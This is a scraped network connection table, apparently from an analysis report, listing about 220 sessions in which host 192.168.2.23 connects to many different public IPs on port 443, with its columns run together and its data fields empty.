                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17481192.168.2.2345622204.73.36.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17482192.168.2.2345544100.142.177.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17483192.168.2.2347808169.155.112.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17484192.168.2.235614298.52.204.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17485192.168.2.2352756172.7.246.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17486192.168.2.235447239.40.42.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17487192.168.2.235357082.252.25.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17488192.168.2.2345402144.164.87.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17489192.168.2.235029646.56.208.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17490192.168.2.2355560100.130.99.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17491192.168.2.2337914194.171.133.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17492192.168.2.2356846145.137.4.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17493192.168.2.2350174170.241.78.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17494192.168.2.2348660132.17.60.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17495192.168.2.233691640.113.88.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17496192.168.2.2345510129.207.171.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17497192.168.2.234828468.161.40.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17498192.168.2.23598662.108.50.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17499192.168.2.2348160129.211.48.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17500192.168.2.2344780120.20.172.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17501192.168.2.236009478.59.200.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17502192.168.2.236015066.60.51.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17503192.168.2.2338854120.122.68.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17504192.168.2.233971450.57.218.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17505192.168.2.2355806103.24.49.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17506192.168.2.2354088156.28.161.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17507192.168.2.2360234128.115.97.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17508192.168.2.2351340174.170.92.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17509192.168.2.235247448.243.71.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17510192.168.2.2344124170.1.164.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17511192.168.2.2345066116.235.34.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17512192.168.2.2336898113.109.21.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17513192.168.2.23339948.251.239.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17514192.168.2.2333344153.247.150.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17515192.168.2.2333014219.24.237.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17516192.168.2.236029227.197.202.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17517192.168.2.2351036205.92.110.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17518192.168.2.2333070118.187.188.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17519192.168.2.2338416167.213.139.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17520192.168.2.2334436185.219.171.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17521192.168.2.235909085.180.30.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17522192.168.2.2350162110.70.111.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17523192.168.2.234435062.234.209.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17524192.168.2.2335072213.31.203.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17525192.168.2.234343285.27.127.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17526192.168.2.2333054149.18.144.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17527192.168.2.2342846161.209.213.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17528192.168.2.2359978136.157.203.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17529192.168.2.234338653.245.213.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17530192.168.2.2359310196.218.93.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17531192.168.2.2332998119.198.229.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17532192.168.2.2339074113.17.200.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17533192.168.2.235943297.206.179.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17534192.168.2.2340196123.176.36.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17535192.168.2.235029213.206.114.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17536192.168.2.235605866.210.192.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17537192.168.2.233856089.60.194.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17538192.168.2.2359080191.217.222.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17539192.168.2.235464472.231.196.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17540192.168.2.2346338186.118.215.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17541192.168.2.2349778213.92.224.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17542192.168.2.23588461.32.200.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17543192.168.2.2358618119.45.4.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17544192.168.2.233783434.14.65.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17545192.168.2.2353202198.216.104.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17546192.168.2.234882058.207.39.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17547192.168.2.233440653.154.206.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17548192.168.2.2338556145.201.212.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17549192.168.2.2350196163.242.238.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17550192.168.2.234327850.58.50.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17551192.168.2.235551898.23.206.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17552192.168.2.235213074.68.196.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17553192.168.2.2346624145.206.220.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17554192.168.2.2340224202.182.76.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17555192.168.2.2357886121.247.255.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17556192.168.2.2339054133.3.53.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17557192.168.2.2335768121.200.47.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17558192.168.2.2340458114.210.147.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17559192.168.2.235630086.37.100.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17560192.168.2.2347858204.109.69.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17561192.168.2.2352702161.100.222.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17562192.168.2.2355374105.126.89.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17563192.168.2.2350770201.44.106.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17564192.168.2.235055050.143.169.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17565192.168.2.234596092.29.21.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17566192.168.2.2344014176.202.64.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17567192.168.2.235645438.103.195.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17568192.168.2.2357606168.132.76.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17569192.168.2.235947661.153.191.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17570192.168.2.2353160112.20.218.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17571192.168.2.2350860103.113.200.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17572192.168.2.2336744188.16.145.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17573192.168.2.2349864117.229.181.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17574192.168.2.2353178135.134.91.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17575192.168.2.2334710105.118.61.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17576192.168.2.233673093.139.146.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17577192.168.2.2344320126.51.178.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17578192.168.2.234391048.249.224.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17579192.168.2.2338880201.3.137.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17580192.168.2.234495617.183.171.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17581192.168.2.233896612.72.141.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17582192.168.2.2341630192.72.72.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17583192.168.2.234383645.100.136.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17584192.168.2.235887214.132.23.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17585192.168.2.2337772108.238.163.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17586192.168.2.2344398195.236.252.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17587192.168.2.235668872.156.70.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17588192.168.2.235633651.167.35.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17589192.168.2.2349096206.200.46.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17590192.168.2.235820014.239.77.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17591192.168.2.2345052138.33.132.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17592192.168.2.2355962145.243.227.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17593192.168.2.2345334131.85.193.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17594192.168.2.2340154112.50.148.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17595192.168.2.2349328111.158.132.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17596192.168.2.233719463.194.33.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17597192.168.2.234126075.1.93.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17598192.168.2.233887423.75.155.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17599192.168.2.235895684.113.152.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17600192.168.2.2333664115.181.74.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17601192.168.2.2356530159.36.146.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17602192.168.2.234950652.1.66.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17603192.168.2.2345568213.3.141.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17604192.168.2.2343550217.80.190.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17605192.168.2.234848654.173.54.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17606192.168.2.2338390152.182.133.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17607192.168.2.234965462.51.111.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17608192.168.2.235071444.67.115.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17609192.168.2.234050094.48.36.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17610192.168.2.234403687.87.241.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17611192.168.2.2360672216.159.38.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17612192.168.2.2339272195.209.142.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17613192.168.2.234242240.169.171.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17614192.168.2.233880296.168.158.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17615192.168.2.234245883.156.223.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17616192.168.2.2341452179.28.215.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17617192.168.2.235766462.185.22.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17618192.168.2.2350760177.246.71.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17619192.168.2.234595091.69.103.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17620192.168.2.235248065.150.2.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17621192.168.2.2342598130.205.29.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17622192.168.2.2352840163.61.83.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17623192.168.2.2336700108.238.32.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17624192.168.2.235623417.213.223.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17625192.168.2.2333168195.251.44.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17626192.168.2.2333574122.72.244.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17627192.168.2.234612220.211.147.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17628192.168.2.2354708184.43.224.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17629192.168.2.233618882.97.237.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17630192.168.2.2340664103.16.236.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17631192.168.2.2356672188.200.200.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17632192.168.2.2350250146.242.79.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17633192.168.2.235065893.50.59.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17634192.168.2.2351610212.20.176.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17635192.168.2.2345504134.78.194.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17636192.168.2.233822086.13.29.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17637192.168.2.234747053.193.5.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17638192.168.2.2352476130.18.130.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17639192.168.2.2346762197.55.67.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17640192.168.2.2334928169.152.144.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17641192.168.2.2346356147.112.41.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17642192.168.2.2350152171.34.72.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17643192.168.2.2344128223.32.203.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17644192.168.2.2337370173.82.178.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17645192.168.2.233329494.232.4.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17646192.168.2.2333876183.121.158.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17647192.168.2.233491467.47.114.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17648192.168.2.235219823.91.103.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17649192.168.2.2352488169.90.26.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17650192.168.2.2339728117.57.119.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17651192.168.2.2349860182.249.47.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17652192.168.2.2339180134.7.35.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17653192.168.2.234427018.140.106.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17654192.168.2.2360008174.239.151.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17655192.168.2.2344596169.173.83.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17656192.168.2.2348432160.50.42.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17657192.168.2.235815084.238.246.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17658192.168.2.2334776157.108.220.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17659192.168.2.235998264.39.182.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17660192.168.2.23468324.0.8.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17661192.168.2.2340652132.210.210.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17662192.168.2.234731459.135.157.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17663192.168.2.2334674153.205.141.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17664192.168.2.2352240140.48.196.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17665192.168.2.2340824128.229.41.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17666192.168.2.2336356161.239.112.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17667192.168.2.2354700165.84.42.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17668192.168.2.2335378176.168.50.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17669192.168.2.2343952211.64.95.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17670192.168.2.234404287.248.245.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17671192.168.2.233888649.155.98.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17672192.168.2.2335742211.13.83.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17673192.168.2.2354358171.10.210.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17674192.168.2.234670298.182.242.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17675192.168.2.2344940149.102.7.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17676192.168.2.235718282.19.252.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17677192.168.2.233917413.27.163.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17678192.168.2.2341892132.87.121.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17679192.168.2.2354608196.143.175.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17680192.168.2.233474077.191.82.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17681192.168.2.235148666.223.236.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17682192.168.2.236051677.216.179.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17683192.168.2.2338862220.114.6.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17684192.168.2.2353156115.90.161.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17685192.168.2.2344222136.205.185.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17686192.168.2.2345940189.37.15.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17687192.168.2.2343208202.202.163.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17688192.168.2.2342418140.123.149.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17689192.168.2.234235878.116.182.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17690192.168.2.233563614.170.242.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17691192.168.2.234293087.123.201.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17692192.168.2.234332049.244.158.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17693192.168.2.233403820.163.220.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17694192.168.2.235902031.27.106.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17695192.168.2.234024220.219.41.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17696192.168.2.233279062.216.200.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17697192.168.2.233528687.72.8.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17698192.168.2.235561440.4.217.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17699192.168.2.234205647.128.196.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17700192.168.2.2351078195.23.78.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17701192.168.2.2350338197.96.207.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
